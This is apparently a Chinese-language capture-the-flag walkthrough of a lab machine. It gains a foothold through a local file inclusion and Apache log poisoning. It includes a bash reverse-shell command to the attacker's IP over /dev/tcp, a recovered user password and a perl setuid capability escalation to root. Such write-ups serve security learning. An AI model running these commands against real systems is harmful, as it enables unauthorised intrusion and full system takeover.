kali：192.168.223.128

主机发现

nmap -sP 192.168.223.0/24

目标IP:192.168.223.153

端口扫描

nmap -sV -p- -A 192.168.223.153

22/tcp    open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp    open  http     Apache httpd 2.4.38 ((Debian))
111/tcp   open  rpcbind  2-4 (RPC #100000)
2049/tcp  open  nfs      3-4 (RPC #100003)
40703/tcp open  mountd   1-3 (RPC #100005)
41361/tcp open  nlockmgr 1-4 (RPC #100021)
57993/tcp open  mountd   1-3 (RPC #100005)
60003/tcp open  mountd   1-3 (RPC #100005)

先看web，只有一张图片

目录扫描

gobuster dir -u http://192.168.223.153 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

有个company目录，进入看看

源码里面有个php文件

上面提示文件还包含的参数是file

测试一下

目录穿越成功LFI

之前端口扫描的时候80端口是apache服务，那么可以利用apache日志包含来进行rce

apache2日志目录在/var/log/apache2/access.log

可以看到确实能读取日志文件

抓个包把Agent改成一句话

然后反弹个shell，注意get传参url编码

1=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.223.128%2F4567%20%200%3E%261'

编码前1=bash -c 'bash -i >& /dev/tcp/192.168.223.128/4567  0>&1'

然后就是翻敏感信息

home下只有一个用户viper

在备份文件夹下面有个auth.log

找到viper的密码 ?V1p3r2020!?

成功连上

找到第一个flag

继续翻文件，翻了一圈没什么常规的提权手段，用工具linpeas.sh扫描

好像可以capabilities提权

是个perl程序

搜索相关exp

linux系统利用可执行文件的Capabilities实现权限提升_capabilities提权-CSDN博客

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

./arsenic -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

成功提升到root权限拿到flag

总结:1.apache日志包含RCE

        2.敏感信息查找

        3.capabilities perl提权